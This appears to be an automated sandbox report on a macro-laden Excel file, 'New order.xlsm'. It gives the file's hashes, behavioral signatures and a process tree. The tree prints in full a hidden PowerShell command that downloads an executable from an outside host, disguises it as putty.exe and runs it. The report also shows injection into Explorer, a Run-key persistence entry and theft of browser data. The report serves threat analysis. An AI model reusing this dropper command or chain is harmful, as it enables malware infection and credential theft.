Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09-07-2020 18:32
Static task
static1
Behavioral task
behavioral1
Sample
New order.xlsm
Resource
win7v200430
Behavioral task
behavioral2
Sample
New order.xlsm
Resource
win10
General
-
Target
New order.xlsm
-
Size
92KB
-
MD5
2433e76542036ab53b138a98eeda548a
-
SHA1
fa75a6ce57ec974345eb05a9d5e587a1eef772be
-
SHA256
148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc
-
SHA512
3ae2f70b3d39d85d1befea180ee75815abb20349a90cf3678db2e001d5ac362f68230e30680c897e33a05a6dbc1d8a776505751da043797b15327bb38251d243
Malware Config
Extracted
http://sagc.be/svc.exe
Signatures
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1492 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1044 1492 powershell.exe EXCEL.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
putty.execmstp.exepid process 1688 putty.exe 1688 putty.exe 1688 putty.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1044 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Loads dropped DLL 1 IoCs
Processes:
putty.exepid process 464 putty.exe -
Office loads VBA resources, possible macro or embedded object present
-
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
cmstp.exedescription ioc process Key created \Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run cmstp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\JV1LTXC8TL = "C:\\Program Files (x86)\\Vmrtp8bmx\\vgardyl_r.exe" cmstp.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exeputty.execmstp.exepid process 1044 powershell.exe 1688 putty.exe 1688 putty.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe 1904 cmstp.exe -
Executes dropped EXE 2 IoCs
Processes:
putty.exeputty.exepid process 464 putty.exe 1688 putty.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
putty.exeputty.execmstp.exedescription pid process target process PID 464 set thread context of 1688 464 putty.exe putty.exe PID 1688 set thread context of 1200 1688 putty.exe Explorer.EXE PID 1904 set thread context of 1200 1904 cmstp.exe Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 1492 EXCEL.EXE 1492 EXCEL.EXE 1492 EXCEL.EXE 1492 EXCEL.EXE 1492 EXCEL.EXE -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
EXCEL.EXEpowershell.exeputty.exeExplorer.EXEcmstp.exedescription pid process target process PID 1492 wrote to memory of 1044 1492 EXCEL.EXE powershell.exe PID 1492 wrote to memory of 1044 1492 EXCEL.EXE powershell.exe PID 1492 wrote to memory of 1044 1492 EXCEL.EXE powershell.exe PID 1044 wrote to memory of 464 1044 powershell.exe putty.exe PID 1044 wrote to memory of 464 1044 powershell.exe putty.exe PID 1044 wrote to memory of 464 1044 powershell.exe putty.exe PID 1044 wrote to memory of 464 1044 powershell.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 464 wrote to memory of 1688 464 putty.exe putty.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1200 wrote to memory of 1904 1200 Explorer.EXE cmstp.exe PID 1904 wrote to memory of 2024 1904 cmstp.exe cmd.exe PID 1904 wrote to memory of 2024 1904 cmstp.exe cmd.exe PID 1904 wrote to memory of 2024 1904 cmstp.exe cmd.exe PID 1904 wrote to memory of 2024 1904 cmstp.exe cmd.exe PID 1904 wrote to memory of 596 1904 cmstp.exe Firefox.exe PID 1904 wrote to memory of 596 1904 cmstp.exe Firefox.exe PID 1904 wrote to memory of 596 1904 cmstp.exe Firefox.exe PID 1904 wrote to memory of 596 1904 cmstp.exe Firefox.exe PID 1904 wrote to memory of 596 1904 cmstp.exe Firefox.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeputty.execmstp.exedescription pid process Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 1688 putty.exe Token: SeDebugPrivilege 1904 cmstp.exe -
Drops file in Program Files directory 1 IoCs
Processes:
cmstp.exedescription ioc process File opened for modification C:\Program Files (x86)\Vmrtp8bmx\vgardyl_r.exe cmstp.exe -
Processes:
cmstp.exedescription ioc process Key created \Registry\User\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmstp.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New order.xlsm"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://sagc.be/svc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')3⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"4⤵
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Users\Admin\AppData\Local\Temp\putty.exe"{path}"5⤵
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\SysWOW64\autofmt.exe"C:\Windows\SysWOW64\autofmt.exe"2⤵PID:1920
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵
- Suspicious behavior: MapViewOfSection
- Adds Run entry to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Modifies Internet Explorer settings
PID:1904 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\putty.exe"3⤵PID:2024
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:596